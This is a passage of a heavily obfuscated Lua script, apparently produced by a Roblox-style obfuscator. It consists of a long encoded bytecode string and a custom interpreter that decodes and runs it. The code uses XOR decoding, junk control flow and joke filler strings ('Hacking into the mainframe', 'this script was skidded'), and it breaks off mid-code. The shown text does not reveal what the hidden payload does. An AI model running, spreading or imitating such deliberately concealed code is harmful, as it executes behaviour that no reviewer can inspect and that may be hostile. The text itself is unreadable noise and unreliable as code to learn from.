732F82Om2Pz312w2Iq22A21F1O24j32GR329e3260325832621222932gY32c231oQ32h21j32H432cD2xC2Z032Mv31lg32MX2X032n032bS317a2392212zE326G1n2u11032d832Ds111t25F2592lI21v324N1032Eg1q21j1y29N32lv22x2o032e81Y2bR1832151B322B2D531zS31zu31tw21U32CG32Ci32Ck32KQ32ks32ku1d32CT32cv32cx312S32Kz32L132D532D7162Gc27R1e1A2Hw32fy31N72222111D21721922E2w829s21e191825a32Ev32fc31Zt2J02e626431sL31Fv315a1D22E28L27622R2nI1L1731e31C26u2v527632k932J91T1V1c2xJ23L26X32fq32at3226324s21m320J320L320N320p32dr31cY25h32kM32ko32Cl32Cn32Cp32cR32oI32KW32ol32Cz32d11h32d332Op32L432dB32dd1b25y32222BC2Ry1d21r32Ia32Ic21Y2121K27632Hw324o1332Hz21W23f1P1Z1f22623621N1Q1o21i1131v632ji325q2QX328K1U1232PZ1l1n28U25l31Uq32fc21j1b32oV1N1x32mQ321s24C2712UU31Za21k1A324s1732Oi1J1m21g28F1l1i1932Pz25325s31Rx21Y21b323m21I326Z1j28J21o2zE32pO1932Ey121g15319p329l1G1M24c26i31N72Eu19324021E32m127622U320q320S2kf1232iQ31Tn26726724a32mO32k82131Q1Y329k329m21E31TZ32cP1P26j31kN27731u131U324N31bp32kN32CK1322129Z22N1H325O32gi1b1721s32qp22L32sL22g31hN22S21E21323723621m25k24g31P531fx31CJ161522r32SE22521832lJ1M22b22H1M2d422a21y1732UN1N2Io327p2JS2X331SP1B24j31Xz31fh29n22f21j31N723731E31M1P23l32qg32oD32KP32qK32KT32qM32OJ32KX32oM32QR32QT32l332d912171432wL151C25A24731v72251Y1q2Cj21321j27o1r1122N23632dx1a1822H32PM1021U1z121832Dn32XC26l23x31Pe28I25e25131n732jQ32or1d22m21D2IQ2341s1u26s31u532Ra21Q171A326i31302b224b3180316r1Z2uu1B21321332j925126731n7326G1j141x312T1022O1921524V32gl22321a324z218322826B323e31qh1826b23v2Li21u21732Y02Gr1e191W21f1j31Tj24U32pB1022x327E21p325p1l23Y26A2Li22821r321y2D41W32B8324D22F31Ox21Z21229N32sz3261191K23F152LI2391r32rw1t32dN319p21721K1I1S26q23w1N31UB2AW1132lV1D328i1i21n32j21N21031xc329G1b2931h315i2iD32K91O315f1E32SZ322632t124D26j29J22c2q81321722932fq22C21O111Q22b221331M2261122722s329V1g32ib315f2kF22K31An2361j2R91B12320C2Id22W28Y141d32Tp32nJ22K31OX22B21O1Q1r1A21J32zu324E321V31ZA29I1L24x25Q2bb32at1j32861R32ef1432t125E32IK31mB1L24B26k2iq31yQ1q1532La32HN319P1J32oC32uG32W932KR32ql32kv32Ok32kY32Wg32L232oQ32DA2bv1332OR1c23j31bT32pw21m21e162el31d131qA21a22D29R22B32iA330K1B215324Y23Q32k7320Y321021q21Q321021F323P2Q931yn1u32jV31n723429d2Fm26v2442fS32FD32Ff32Fh111Y32Sx111726N32GF2Ir1R1o28X2GG32ie22521031Ye1i325432pn1h2nI1423g2j032gG32QB21M327g334u24A27T21321B1231RX28931SA332M23c1u2Iq22T1m27s335i32y732Y921e22B32AM32N531AG2cB1I26G26O32qH32OE32WA32oH32wD32qp32oN32qS333p32L428132wm28r1426H26629j21x217335926J31b1322L2Ni31061126B23t2fS23B32lN3214335r1F151P1I32sk1m21K22A2ze32SW32y0335232x01732eb32eD1824h25R31RX32pO1d1632dl2Jy1O21Q21S2D52361N32AG327u2m132P522d1H219142653333323r32FE21B220336e323032me3270324d1y23331vk1031S81T22A326T326V12326x332M21X22X32yc32sr32Q02XJ2263274327632g61l335F311532pn324K33841228X2Zt1v1j26b23Y2A232xA1I1M21h2DT1532H931Yq31Yh32S024x32Hs31Ub191p23W32Yf32Eq327s3231327y32O01H338t32711k23G2Li32oz32zR1732ZT32F82311p31V732241s32ru1b330a1v32rZ32S132xL27623432dm171Q22x313933b532rX330c1N330e330g26n337c32rS2gY32vI32o332M832LP32Z8330431Rx326G1q1B333032M51732ZH2D522I21H339O31Th1M26G2wC10338B32Ag32tD31Y9336922U32Sj1v1m23C32HF21u32WY2dQ1123A318621C2342JG2eD22B21R3306330n25E24j31O1326g328C328E328G328I327i328l328n22S1o31n722s33541N1I25z312F327m1n21H324y24S25L2Id32Wt1b1h1P1921I32r5315f25G2582iD22C32y832nH324932f825b2rW32pw32B42AZ330s328v319P24u33ac31ZA21N28Y1R15336921Y317f23U25N21031Y431Y622432dE31ya21w1d31yE31YG31yi23a21R1t1l32EJ17226323a1N21u23f1821O27k21F22d2YB237326b31sr1m336923833BP19231330632PN327H21m32j232Fe32hJ324e33bb1032DJ32dL32dn32Za32zC1q21f33892q9330K32G11722u32ep1032Wt32wv1m29p29r2js320T1V1N324s111z32jE329e21m1433141d2Xj21O21F33061S1621R32R2192HZ23d1k29r33dc29m32Rx1P1533fO31H921z21H32T12c51D26a33C7321p32f822F31pH32nv1832LV31D72ed33DI26H2432a2238327T33Fi1923E322C2Jv33fc1432nu1h25g32J51032Zy29N2hz1z22e31V7323l32s0337i32X528s2Th32O921a32Jo21V21d2931d1t214334M2bc21932Da32SR32MB32x921c32261A1X21133AP24P26y32N4323032H132n732Br31252XC26432Al31hO32c331Hr24o24E31n721t21e32l01H22X33dA27622t330k328m21h31TS2jv338J2D822O32Nz338Z32Dx1921432Aa1r22I31LV2BL21N335a320m32Za32T727232BP10316I312332n931271J339H317627824R32yy2381T32x524X32ZF337232e332Z81126a24s336l333i32Og32WC32qo333N33Jw32Wh333Q313V32X528m1A26532ZN32FC21721e1221P1H2181X21622Q328M1722e23427t1A21K1O33lD32QJ333J32wB333l32WE32Qq33lj336t32d932V8313x29v1321T32H932At335L1r26h32yY32Lh32FE26033cz32mP32f83398339a32pz32q131Cy31ma22021331y332RZ21c32z522k32X832MW1621432tM1032M332Ef28u2c331tc32rS29d326i21d32Nc276320F320h32Qa32ai320N31Ud1k21p32e71022e21R31cr111K1D21l32b12331I2FS2En32H62QG33KX24n24r32C1336F33JH316W32C6316z32C932N833jK317a26V33dn32Fc325e31Ui21J218331L161T331F324432TN1f323M32Vi32Z82qm26i24d31Ua32JP1x32DA1K27h32eb2C32132161a325P1821A29A1l21D32Zb31tJ1726t32XX2d62c932ns23g32I231Oy33Kk335b32s933cA339M1K32892xg331S31yD331V32iC2Kf33f6330t26B23n31N722e32U31g325331N7338h338j22n25123Q27o31Ys2771221M21k2a51631Zf23423427f1K312r2uv2192T92722722MW1421L21L2mz1523S23S2Tj24j24j2Gt2GZ25t25t2H21825i25i2tS1925D25D2ZK1A2592592gT2HF26w26w2Zp1C2Qg2GT314k2lI2GA1Q1e328m2gT1R1F1x32uF31R51g24s24S2gT2Tg314V2GU26P26P2Gt171j1O2m831e91K23V23v2GT111l22T22T2gT121m24i24I2gT32cu21r21R2gT1c1o33S42GT329L2122i42Gx1e1q23032IQ2ga33P923x23X2gT181s26J26j2GT32sR24e24E2Gt1a1u23d23D2gt1b1v2582582gt21G1W21V21V2Gt21H1x23q23Q2Gt21I1Y2552552gt21j2PG23N2Gt21c21021p2Dp2Gx21d2111r33pG2GA21e21226V26V2GT21f21325J25j2GT21O21424V24V2GT21P21525L25L2gT21q21622v22v2Gt21r21721D21d2GT21k2182112112gT21l2192332332Gt21M21a318Y21N21B23U23U2Gt21021C22Y22y2gT21121D31tp2GT21221E2472472gt21321f2612612gT1w21G24924927f32wL32f0312921G2T927327333rJ21E33JV2Gx2gq31F8318w2eD33ru1721w21w33ry21g21g33s224t24T33s625V25V33SA31V2316Q2ga28Q26K26K33SH1D22I22I2gt33SL27127133SO1F21632km33sT2NG2tg25E25e2gt2gu26426433T31J25S25s2gT101k26q26q33Tc1l24024033TH1m33ZI33tm1n22Q22Q33Tq1O24a24A33TU33AA23W2gt33tZ23H23H2gT33p923j23j33u732XU1U33uC1t26326333Ug1u21T21T33UL1V24q24q33uq1w23P23p33Uv1x22022033V01y26a26a33v51Z26F26F33V92102262262Gt33Vf25U25U2GT33vk21B21B33VO21325a25a33vt21422922933vy215319O33W423t23t33w821725625633wD21831Z433WI21922p22p33WN21a25Y25y2GT33wr22x32Ny2Gx33ww25725733x021D33to33X421E25C31aA2ga33XA26626633Xe21G22n22n33XJ142i833Y42T923y23y33rJ23B23b33RN1n330k2Gx2ga22O33k92N51723923933Ry32m833s221M21m33S623r23R33yc31jj31991C31NH1d24524533Yn1e25k25K33yR2Hd322S22K22k33sx1H22c31C92gx2gU24l24L33Z426E26E33Z833pK2Cn2gx33Td27m33Zh32Tv33Zk22322333zO26226233ZS22j22J33zV1q25325333zz1r24x24x340325N25N340625P25p340a21y21y340E24B24b340i241241340M222222340q32sz340U24F24f340y25z25Z341221122A22A341621225M25M341A242242341E24d24D341i24N24n33W32162Wt341o243243341s23I23i341V225225341z21S21s342321b22E3165342721c23m23M342B224224342e23c23c33x921F22L22L342m2Z53354342r27r342T31e224W24w33rj28027O2tf26H26H2Tj2i52TM1721z21z33Ry26026033s226s26S33s625425433Yc31my28Q25w25W33Yj235235343R21033EP2GX33Sp313V347f16322s26X26x344023f23f33z01I25X316E2gA33T426G26g344B24Y24Y33zd26t26t33ZH22B22B33ZK33x32gx33tr24624633Zs24g24G344S328c344W24c24c340323g23g340622Z22z340A21C21C340e25O25o340I2hp340M26D26D340q24u24U340U33Ke340y31jh33VF1Y326M33VJ212250250341a319833VU25B25b341I22122134671v31Y32Gx33W922r22R341s231231341V1W32GY2Ga33Wo314633Wr24R32uA2gA33Ww31Dl2Ga33X124M24M342E24424434701z1Z342m26u26u342q31mv347931qz2fS3476122ay2iI21421631YZ2Z622D22d27f18343M2aL33xx34BU27623n24A1T143449276345o313G2O033Z62FN171832BZ32l72So31512Ne26M26M313g2j033Z2313g31yN33zb2FN2tA33Zf31X62Zs34C127k28c2ZE2AG21f31ox318n1t31yf2Ic2ag31yE2BB33se24K24K27f1I1P1a2Ic2hx21I21r2A22g423n23M151434C910340w313g32EJ34cC2Sw33bV334I31Vu34Bx31N731xE314426N26N31XS21F29j31w51q32ej1q1q313G2Zt33uy31nP1Z152652652ay347l23823827F33QS31N72g01121921429j27F21h21c34f031xm34el23K23K27D347l2NL2h321U310q2A6320W346v2fN16192822C22nE21X21X33YC23o23o33sE2372372u632f31031x61Q335y340G2FN32fG340k2G42Ac32Fg2702702hX21F32W027634g633AQ162282pM1531IY1822s22s33S226O26o2U631AN2c22I22i234Gi34EP33p41933zQ33S621A2b12hO32kG1034Gf33WP25H25H2g02NE22W22w33yC23A23A33sE23L2xV2u3236236343R25g25G27633R321J28s2mq34dl2a22b62i233WP34Gx34gk31EH1A348w33yc2482482u632x82Fw2I221b192692692gn2Ga2Hf21821831Xs21q29R34iC1734IE21k21k314r2161Y2ZJ31xM34iE25F25F34Ii2nH22H22H33sE33r02cI21o329k2aH2Z531x22o834iO314n34iD1934j134J32hf28e34J727k34j934JB2ao27731Vu21I34jg319f34ji34JK1834ij1b26z26Z34jO27o1634jA327i2a934f034ju34jW2fl34JI34it34IV34Ix2uE34Ie34Ig34jl1B26i2Py2iE34Jw34iQ34j034J234K02nh26B26B34k534JQ34k92mf34jE34jV29R34kE34iR34Jj34ku34k122g32ks33yF32nG34k634k82aH2H534L334kD1D34Jy34L92NH219310134ld34j834K734JR2sV34lJ34L534ll34l734kG181134IW34iY34JI34Kl34Kv2hF26y26y34In34iP1B34lM34Km24o24O34kZ34lt34k92TU34Lw34jh34l734jZ34k126c26C34Mi34Lg320W2zJ34kc34lX34ME34M732yA21334mt34jr2UJ34mM34JX34mO34ln2hf34Mg34N334k92Ug34N634L634kK34IH34n032aE34mB27634Ks1934M034M234ki31jf34ie34I234k123223233sE22U22u34Fw29r2ic2i232VD34NU343l21N33yE2zS22M22m2u632Sg34mN320Z34J12G42U3314333sL34ls21O21H34Hv2tb34L321O2bB34hZ17320z34o62hL24H24H343r23e23E2U633kI31jp1e2I22161c34o633SL26826833yR24p24P2u631oX34OU2171d34ig34CW33sp25Q25q31XS21M2lI34Pk1D34it313T21621231222i234Pl34O633sP22f2m233St26L26l2u621r2li2T42i22141e34o6322s26r26R34402272272u632T32762TH2I232j734IG2oF32V81H24Z24z31xs21K2fs34qS1732J734iT318n21621031Qm34Qt1f34j134Qw2tG1S2M62zB1i23Z23z27634K721531282LH2X734ju34r227629c31NY10"),(#V-((101-#("There we go"))));local function r(n,e,...)if(n==782438256)then return(c((((e)-808600)-816512)-407131,415152));elseif(n==278940586)then return(c(c((e)-478636,364213),890883));elseif(n==766748547)then return(c(c((c(c(e,384173),281858))-94625,798309),255161));elseif(n==864561623)then return(c((c((e)-908425,901813))-964062,391717));elseif(n==723925316)then return((((c(e,888845))-410441)-237861)-813641);elseif(n==988567061)then return((c(((e)-384381)-240442,403274))-381728);elseif(n==679603595)then return((c(((e)-442711)-352381,752382))-456758);elseif(n==499853431)then return((c(c(c(e,433240),97429),226245))-585984);elseif(n==548737277)then return((c((c(c(e,682729),151876))-718853,539121))-813028);elseif(n==399352374)then return(c(c((c(e,882384))-322703,661356),495593));end;end;local function n(e,n,...)if(e==810557470)then return(((c(n,367374))-959029)-969603);elseif(e==283531522)then return(c(c(c(n,998540),252856),670870));elseif(e==8658258)then return(c(((((n)-718261)-276899)-170129)-683899,789109));elseif(e==214999166)then return(c((c((n)-156385,27150))-598430,965022));elseif(e==948653411)then return(((c(c(c(n,673855),484669),519455))-680798)-5659);elseif(e==585238267)then return(c(((c(n,975362))-734131)-26514,597004));else end;end;if _ENV then _ENV._ENV=_ENV end;local p=d[((530907686-#("fixed")))];local l=d[((#{61;397;120;868;(function(...)return 560;end)()}+480434855))];local m=d['NtyxXBO3AE'];local C=d[((#{(function(...)return...;end)()}+909102315))];local B=d[(275182581)];local n=d[((450985865-#("Raid: Shadow Legends here, I can confirm this script was skidded")))];local a=d[((270656799-#("funeralW")))];local F=d[((#{}+971311728))];local f=d[(958828656)];local function t()local o=c(D(b,x,x),e);e=o%n;x=(x+l);return(o);end;local function s(x,e,n)if(n)then local e=(x/a^(e-l))%a^((n-l)-(e-l)+l);return(e-(e%l));else local e=a^(e-l);return(((x%(e+e)>=e)and(l))or(f));end;end;local function f()local l,o=D(b,x,x+a);l=c(l,e);e=l%n;o=c(o,e);e=o%n;x=x+a;return((o*n)+l);end;local function a()local a,o,d,l=D(b,x,x+C);a=c(a,e);e=a%n;o=c(o,e);e=o%n;d=c(d,e);e=d%n;l=c(l,e);e=l%n;x+=B;return((l*F)+(d*p)+(o*n)+a);end;local k=""..d[m];local function y(...)return({...}),R(k,...);end;local function X(...)local J=d[(593684006)];local M=d[(297664171)];local j=d[(92522146)];local n=d[(480434860)];local V=d[((#{622;552;516;(function(...)return 15,46,...;end)()}+356085747))];local w=d[(131841274)];local C=d[((270656854-#("Remember when psu messed with ms? ok fed is now head management")))];local y=d['BhLIjsO7R'];local F=d[(909102315)];local h=d[(450985801)];local i=d[(57646291)];local R=d[((#{143;404;(function(...)return 518,590,521;end)()}+803881226))];local m=d['J0YMudhl0L'];local X=d['D129IH'];local l=d[(958828656)];local z=d[(249927036)];local B=d[((#{991;}+153990746))];local k=d[(275182581)];local v=d[(742554852)];local _=d[(623506417)];local Y=d['DZV9R'];local S=d[((619472848-#("8=========D ~~")))];local p=d[(960565322)];local Q=d[((711042171-#("Hacking into the mainframe")))];local function g(...)local d=({});local r=({});local N=({});for e=l,a(e)-n,n do N[e]=g();end;local T=o(t,e);local g=f(e);for f=l,a(e)-n,n do local r=t(e);if(r%i==_)then local e=t(e);d[f]=(e~=l);elseif(r%i==m)then while(true)do local a=o(a,e);if(a==l)then d[f]=('');break;end;if(a>J)then local l,t=(''),(E(b,x,x+a-n));x=x+a;for n=n,#t,n do local n=c(o(D,E(t,n,n)),e);e=d0(n,h);l=Z(l,A[n]);end;d[f]=l;else local n,l=(''),({D(b,x,I(q(x,a),n))});x=x+a;for x,l in n0(l)do local l=c(l,e);e=l%h;n=n..A[l];end;d[f]=n;end;break;end;elseif(r%i==F)then while(true)do local t=a(e);local x=a(e);local c=n;local a=(s(x,n,v)*(P(C,y)))+t;local e=o(s,x,i,Y);local x=(P((-n),s(x,y)));if(u(e,l))then if(a==l)then d[f]=O(H(x,l));break;else e=n;c=l;end;elseif(e==M)then d[f]=(u(a,l))and(x*(n/l))or(x*(U(l,l)));break;end;local e=H(l0(x,e-S),(c+(a/(P(C,z)))));d[f]=u(e%n,l)and O(e)or e break;end;elseif(u(r%i,C))then while(true)do local e=o(a,e);d[f]=E(b,x,I(x+e,n));x=x+e;break;end;else d[f]=nil end;end;local x=a(e);for e=l,x-n,n do r[e]=({});end;for y=l,I(x,n),n do local x=o(t,e);if(L(x,l))then x=x-n;local E,i,c,D,A,h=l,l,l,l,l,l;local b=s(x,n,F);if(u(b,l))then A=(t(e));c=(f(e));h=(o(f,e));i=(f(e));elseif(u(b,F))then A=(t(e));c=(o(f,e));h=(o(f,e));i=r[(o(a,e))];elseif(u(b,n))then A=(o(t,e));c=(o(f,e));i=(a(e));elseif(b==C)then A=(o(t,e));c=(o(f,e));i=r[(o(a,e))];elseif(b==B)then A=(t(e));c=(f(e));h=(f(e));i=(a(e));E=({});for x=n,h,n do E[x]=({[l]=t(e),[n]=f(e)});end;elseif(u(b,w))then end;if(o(s,x,w,w)==n)then h=d[h];end;if(o(s,x,k,k)==n)then c=d[c];end;if(u(s(x,m,m),n))then D=r[a(e)];else D=r[y+n];end;if(u(s(x,B,B),n))then i=d[i];end;if(s(x,p,p)==n)then E=({});for e=n,t(),n do E[e]=a();end;end;local e=r[y];e[-612849.8743197833]=i;e[R]=A;e['jtZY']=E;e['MsCQPqbk']=D;e[-241349.689203807]=h;e[V]=c;end;end;return({[-Q]=d;["J0ja3aYa"]=r;["fibqF0w"]=g;[166416.9458109452]=T;[X]=l;[j]=N;});end;return(g(...));end;local function C(e,A,s,...)local t=e["fibqF0w"];local a=e['J0ja3aYa'];local p=s['\67\70\114\97\109\101'];local x=0;local f=e[166416.9458109452];local F=e[579799];local e=e[-886004];return(function(...)local n={};local l=26861;local N=384253;local e=(true);local o='MsCQPqbk';local B={};local m=({});local u=a[x];local g='jtZY';local x=-612849.8743197833;local E=(R(k,...)-1);local e=(303871361);local b=-(1);local a=-241349.689203807;local D={...};local e=p and 1 or 0;for e=0,E,e do if(e>=f)then B[e-f]=D[e+1];else n[e]=D[e+1];end;end;local E=E-f+1;repeat local e=u;local f=e[N];u=e[o];if(f<=29)then if(f<=r(c(863449123,469163432),1680526))then if(f<=6)then if(f<=c(747552828,d[273720328]))then if(f<=c(747552830,d[273720328]))then e=e[o];local b;local E;local h;local r;local f;local c=0;local function d(e,n,l)e=(c+e)%3 c=((e~=0)and c+((e<2)and n or-n)or c*n)%l return c end for o=2,28 do if d(8815,7959+o,624)>=312 then if d(9804,3269+o,3162)<1581 then if d(4297,9263+o,3626)<=1813 then f=e[E];else b=s;end else if d(2378,4068+o,3740)<=1870 then else n[f]=r;end end E=l;else if d(4573,7382+o,728)>=364 then if d(2948,5624+o,2588)<=1294 then u=e[x];else end else if d(8642,5449+o,3642)<1821 then n[e[l]]=n[e[x]];else h=e[x];end r=b[h];end end end n[e[l]]=n[e[x]][e[a]];e=e[o];n[e[l]]=n[e[x]][e[a]];e=e[o];n[e[l]]=n[e[x]][e[a]];e=e[o];n[e[l]]=n[e[x]][e[a]];e=e[o];n[e[l]]=s[e[x]];e=e[o];n[e[l]]=n[e[x]][e[a]];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];local r;local s;local f;local c=0;local function d(e,n,l)e=(c+e)%3 c=((e~=0)and c+((1==e)and-n or n)or c*n)%l return c end for o=1,29 do if d(3031,4225+o,1772)>=886 then r=l;if d(5429,2969+o,3788)>=1894 then if d(1861,4236+o,1686)>=843 then s=e[x];else end f=e[r];else if d(1878,1059+o,1976)>988 then else end end else n[f]=s;if d(3814,9444+o,496)>=248 then if d(7797,4330+o,240)<120 then else end else if d(1886,1441+o,2280)<=1140 then else end end end end local f;local r;local s;local c=0;local function d(n,e,l)e=(c+e)%3 c=((e~=0)and c+((e<2)and n or-n)or c*n)%l return c end for o=2,34 do if d(1685,7611+o,1404)<=702 then s=e[f];if d(8363,1937+o,778)<=389 then n[s]=r;if d(3150,1240+o,676)>338 then else end else if d(9877,2480+o,3388)<=1694 then else n[e[l]]=e[x]-e[a];end end else f=l;if d(6578,3367+o,3530)>1765 then if d(7856,3913+o,302)>151 then n[e[l]]=#n[e[x]];else local o=e[x];local x=n[o];for e=o+1,e[a]do x=x..n[e];end;n[e[l]]=x;end n[e[l]]=n[e[x]]+e[a];else if d(4832,9246+o,3288)<=1644 then else r=e[x];end end end end n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];local d=e[l];n[d]=n[d](i(n,d+1,e[x]));for e=d+1,t do n[e]=nil;end;e=e[o];n[e[l]][e[x]]=n[e[a]];e=e[o];n[e[l]]=A[e[x]];e=e[o];local d=e[l];local c=n[e[x]];n[d+1]=c;n[d]=c[e[a]];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];local l=e[l];n[l](i(n,l+1,e[x]));for e=l+1,t do n[e]=nil;end;e=e[o];e=e[o];elseif(f>((h[487706440])or(d[115430017](c(182323675,d[114931249]),c,h,487706440))))then local e=e[l];do return i(n,e,b);end;elseif(f<2)then local l=e[l];local d=n[l+2];local o=n[l]+d;n[l]=o;if(d>0)then if(o<=n[l+1])then u=e[x];n[l+3]=o;end;elseif(o>=n[l+1])then u=e[x];n[l+3]=o;end;end;elseif(f<=((h[722852233])or(d.hwyBAxcsy(c(747561755,d[273720328]),c,h,722852233))))then if(f==r(988567061,884000))then n[e[l]]=#n[e[x]];elseif(f<=r(c(826665033,d[273720328]),c(239529724,239766768)))then n[e[l]][e[x]]=e[a];e=e[o];n[e[l]]=s[e[x]];e=e[o];n[e[l]]=n[e[x]][e[a]];e=e[o];n[e[l]][e[x]]=e[a];e=e[o];n[e[l]]=A[e[x]];e=e[o];local d=e[l];local c=n[e[x]];n[d+1]=c;n[d]=c[e[a]];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];local l=e[l];n[l](i(n,l+1,e[x]));for e=l+1,t do n[e]=nil;end;e=e[o];e=e[o];end;elseif(f>r(c(20801469,d[273720328]),c(181109270,d[943807356])))then local l=e[l];local d=e[x];local x=50*(e[a]-1);local o=n[l];local e=0;for d=l+1,d do o[x+e+1]=n[l+(d-l)];e=e+1;end;elseif(f<r(723925316,1826480))then e=e[o];n[e[l]]=s[e[x]];e=e[o];n[e[l]]=n[e[x]][e[a]];e=e[o];n[e[l]]=n[e[x]][e[a]];e=e[o];n[e[l]]=n[e[x]][e[a]];e=e[o];n[e[l]]=n[e[x]][e[a]];e=e[o];n[e[l]]=s[e[x]];e=e[o];n[e[l]]=n[e[x]][e[a]];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];local d=e[l];n[d]=n[d](i(n,d+1,e[x]));for e=d+1,t do n[e]=nil;end;e=e[o];n[e[l]][e[x]]=n[e[a]];e=e[o];n[e[l]]=A[e[x]];e=e[o];local c=e[l];local d=n[e[x]];n[c+1]=d;n[c]=d[e[a]];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];local l=e[l];n[l](i(n,l+1,e[x]));for e=l+1,t do n[e]=nil;end;e=e[o];e=e[o];end;elseif(f<=((h[412001550])or((function(e)h[412001550]=c(c(c((e)-304361,820849),874420),346760);return(h[412001550]);end)(c(44221626,44795018)))))then if(f<=r(c(100696234,d['r4x0mp']),1826482))then if(f>7)then n[e[l]]=s[e[x]];elseif(f<r(766748547,1093082))then e=e[o];n[e[l]]=s[e[x]];e=e[o];n[e[l]]=n[e[x]][e[a]];e=e[o];n[e[l]]=n[e[x]][e[a]];e=e[o];n[e[l]]=n[e[x]][e[a]];e=e[o];n[e[l]]=n[e[x]][e[a]];e=e[o];n[e[l]]=s[e[x]];e=e[o];n[e[l]]=n[e[x]][e[a]];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];local s;local r;local f;local c=0;local function d(n,e,l)e=(c+e)%3 c=((e~=0)and c+((1==e)and n or-n)or c*n)%l return c end for o=1,26 do if d(6941,8598+o,2488)>=1244 then s=l;if d(2731,2338+o,362)<=181 then if d(7292,7929+o,568)<284 then else u=e[x];end else if d(1247,2265+o,610)<305 then r=e[x];else end end else f=e[s];if d(1472,8440+o,824)<412 then if d(6469,3375+o,2588)>=1294 then else local o=e[x];local x=n[o];for e=o+1,e[a]do x=x..n[e];end;n[e[l]]=x;end else if d(6668,4633+o,3878)>1939 then if(e[l]~=e[a])then u=u+1;else u=e[x];end;else n[f]=r;end end end end n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];local d=e[l];n[d]=n[d](i(n,d+1,e[x]));for e=d+1,t do n[e]=nil;end;e=e[o];n[e[l]][e[x]]=n[e[a]];e=e[o];n[e[l]]=A[e[x]];e=e[o];local c=e[l];local d=n[e[x]];n[c+1]=d;n[c]=d[e[a]];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];local l=e[l];n[l](i(n,l+1,e[x]));for e=l+1,t do n[e]=nil;end;e=e[o];e=e[o];end;elseif(f>9)then n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];local t;local i;local f;local c=0;local function d(n,e,l)e=(c+e)%3 c=((e~=0)and c+((e<2)and n or-n)or c*n)%l return c end for o=2,25 do if d(3061,4467+o,826)<=413 then t=l;if d(4583,7223+o,2442)>1221 then if d(7854,2562+o,738)<369 then else i=e[x];end f=e[t];else if d(2002,3782+o,242)<121 then n[f]=i;else end end else if d(6237,1807+o,2546)<=1273 then if d(6055,3084+o,3614)>1807 then else end else if d(9984,9491+o,2414)<1207 then else end end end end n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];local f;local t;local i;local c=0;local function d(e,n,l)e=(c+e)%3 c=((e~=0)and c+((1==e)and n or-n)or c*n)%l return c end for o=1,25 do if d(1552,8353+o,3458)>1729 then if d(1285,5477+o,290)>145 then if d(9902,8255+o,652)>=326 then else i=e[f];end else if d(8071,8882+o,2940)>=1470 then else n[i]=t;end end else if d(3279,2027+o,3894)>=1947 then if d(5741,3796+o,1848)<924 then f=l;else t=e[x];end else if d(9860,1588+o,3110)<=1555 then else if(e[l]~=e[a])then u=u+1;else u=e[x];end;end end end end n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];local t;local f;local c;local a=0;local function d(n,e,l)e=(a+e)%3 a=((e~=0)and a+((e<2)and n or-n)or a*n)%l return a end for o=0,28 do if d(1580,2867+o,3950)>1975 then t=l;if d(6918,9653+o,848)>=424 then if d(1670,5501+o,2936)>1468 then f=e[x];else end else if d(5358,5268+o,768)>=384 then else end end else if d(1395,2152+o,3988)>=1994 then c=e[t];if d(2921,2580+o,1302)<=651 then n[c]=f;else end else if d(9491,4964+o,2320)>=1160 then else end end end end n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];e=e[o];elseif(f<r(278940586,1008744))then local c;local f;local t;local r;local i;local s;local d=0;local h=0;local function o(n,e,l)e=(d+e)%3 d=((e~=0)and d+((e<2)and-n or n)or d*n)%l return d end for d=2,26 do if o(1398,2669+d,416)>208 then if o(4813,5289+d,1050)<525 then if o(2322,3329+d,462)<=231 then else end else if o(4181,7574+d,888)>=444 then c=e;else s=c[t];end f=x;end else if o(5994,2947+d,1648)<=824 then if o(1447,5722+d,1730)<865 then else n[e[l]]=n[e[x]]+e[a];end else if o(9097,8735+d,1616)<808 then if h~=1 then n[s]=i;h=1;end;else t=l;end r=n;end i=r[c[f]];end end end;elseif(f<=((h[824292580])or((function(e)h[824292580]=c((c(c(c(e,222395),258631),366507))-742247,246605);return(h[824292580]);end)(c(766665246,767063521)))))then if(f>r(c(248176715,595150792),c(821623479,820533088)))then e=e[o];n[e[l]]=A[e[x]];e=e[o];local c=e[l];local d=n[e[x]];n[c+1]=d;n[c]=d[e[a]];e=e[o];n[e[l]]=e[x];e=e[o];n[e[l]]=e[x];e=e[o];local l=e[l];n[l](i(n,l+1,e[x]));for e=l+1,t do 